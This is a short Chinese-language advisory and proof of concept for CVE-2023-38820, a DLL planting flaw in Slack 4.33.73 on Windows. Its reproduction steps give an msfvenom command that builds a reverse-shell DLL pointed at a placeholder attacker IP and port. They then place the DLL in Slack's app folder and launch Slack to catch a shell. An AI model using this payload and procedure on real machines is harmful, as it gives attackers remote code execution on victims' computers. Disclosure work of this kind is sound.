DLL-Planting-Slack-4.33.73-CVE-2023-38820
Slack 4.33.73 中的 DLL 植入 - CVE-2023-38820
发现者:Idan Malihi
描述
Slack v.4.33.73 中的一个问题允许本地攻击者通过 profapi.dll、CRYPTBASE.dll、KBDUS.DLL、DPAPI.dll、MSASN1.dll、mf.dll、mfplat.dll 和 RTWorkQ.DLL 文件中的 DLL 加载机制执行任意代码。
复现步骤
要利用该漏洞,攻击者应下载并安装 Slack 程序,并按照以下步骤操作:
- 使用 msfvenom 创建一个恶意 dll 文件:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f dll -o profapi.dll
- 将恶意 dll 文件传输到受害者的计算机上
- 打开 Slack 路径:"C:\Users\idan.m\AppData\Local\slack\app-4.33.73"
- 将恶意 dll 传输到 Slack 路径,并将其命名为 "KBDUS.DLL"(例如)。
- 打开 netcat 或 metasploit 监听器
- 打开 Slack.exe
- 获得一个反向 shell。